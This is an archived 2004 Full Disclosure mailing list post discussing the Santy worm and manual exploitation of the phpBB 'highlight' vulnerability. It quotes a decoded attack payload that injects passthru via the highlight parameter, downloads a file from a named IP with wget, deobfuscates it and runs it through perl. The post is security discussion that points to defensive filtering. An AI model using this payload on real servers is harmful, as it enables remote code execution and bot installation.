....
 

Guardian Digital Inc. > InfoCenter > Mailing List Archives > Full Disclosure

Full Disclosure Mailing List Archive

From: Paul Laudanski (zx@castlecops.com)
Date: Thu Dec 23 2004 - 23:40:46 EST


On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The
exploit it uses is only able to transfer around 20 bytes of data at a
time. So the worm transfers itself from one web site to another in small
chunks."

"If a chunk gets missing, the worm might still work fine... or it might
fail," Hypponen told ComputerWire. "More generations there are, more
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[ About Guardian Digital ] - [ Press Center ] - [ Contact Us ] - [ System Activation ] - [ Reseller Info ] - [ Online Store ] - [ Site Map ]
Copyright (c) 2000 - 2004 Guardian Digital, Inc. Linux Lockbox and EnGarde are Trademarks of Guardian Digital, Inc.